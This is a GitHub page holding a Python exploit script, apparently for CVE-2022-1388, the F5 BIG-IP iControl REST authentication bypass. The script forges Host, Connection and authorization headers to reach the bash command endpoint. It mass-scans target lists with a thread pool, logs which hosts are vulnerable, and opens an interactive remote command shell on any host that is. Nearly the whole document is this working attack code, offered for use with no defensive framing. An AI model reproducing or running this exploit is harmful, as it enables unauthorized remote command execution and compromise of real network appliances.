-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathcve.py
94 lines (78 loc) · 2.78 KB
/
cve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
import json
import requests
import sys
from multiprocessing.dummy import Pool
class Exploit:
def __init__(self):
print("""
░█▀▀█ ░█──░█ ░█▀▀▀ ── █▀█ █▀▀█ █▀█ █▀█ ── ▄█─ █▀▀█ ▄▀▀▄ ▄▀▀▄
░█─── ─░█░█─ ░█▀▀▀ ▀▀ ─▄▀ █▄▀█ ─▄▀ ─▄▀ ▀▀ ─█─ ──▀▄ ▄▀▀▄ ▄▀▀▄
░█▄▄█ ──▀▄▀─ ░█▄▄▄ ── █▄▄ █▄▄█ █▄▄ █▄▄ ── ▄█▄ █▄▄█ ▀▄▄▀ ▀▄▄▀
Coded by @justakazh
""")
itype = sys.argv[1]
if itype == "m":
flist = [i.strip() for i in open(sys.argv[2], "r").readlines()]
self.iendpoint = sys.argv[3]
self.icommand = sys.argv[4]
p = Pool(int(sys.argv[5]))
p.map(self.massCheck, flist)
if itype == "s":
iurl = sys.argv[2]
icommand = sys.argv[3]
self.singleCheck(iurl, icommand)
def massCheck(self, url):
try:
url = url.replace("http://","").replace("https://","").replace("/","")
h = {
'Host': '127.0.0.1',
'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
'X-F5-Auth-Token': 'asdf',
'Connection': 'X-F5-Auth-Token',
'Content-Type': 'application/json'
}
# print("http://"+url+self.iendpoint)
target = "http://"+url+self.iendpoint
req = requests.post(target,headers=h, verify=False, data=self.icommand).text
if "commandResult" in req:
c = json.loads(req)
print("\n[+] Vuln -> %s" % target)
print("[>] Response: %s\n" % c['commandResult'])
open("result.txt", "a").write(target+" | "+self.icommand+" \n")
else:
print("[-] Not Vuln -> %s" % target)
except Exception as e:
print("[!] %s : %s" % (url,e))
pass
def singleCheck(self, url, icommand):
try:
url = url.replace("http://","").replace("https://","")
target = "http://"+url
h = {
'Host': '127.0.0.1',
'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
'X-F5-Auth-Token': 'asdf',
'Connection': 'X-F5-Auth-Token',
'Content-Type': 'application/json'
}
# print("http://"+url+self.iendpoint)
req = requests.post(target,headers=h, verify=False, data=icommand).text
if "commandResult" in req:
c = json.loads(req)
print("[+] Target is Vulnerable!")
print("type 'exit' to quit\n\n")
while True:
i = str(input("~$"))
cmd = i.replace(" ",",")
csend = json.dumps({'command': c['command'], 'utilCmdArgs': '-c {'+cmd+',}'})
if i == "exit":
os.exit()
req2 = requests.post(target,headers=h, verify=False, data=csend).text
c2 = json.loads(req2)
print(c2['commandResult'])
else:
print("[-] Not Vuln -> %s" % target)
except Exception as e:
print(e)
if __name__ == "__main__":
Exploit()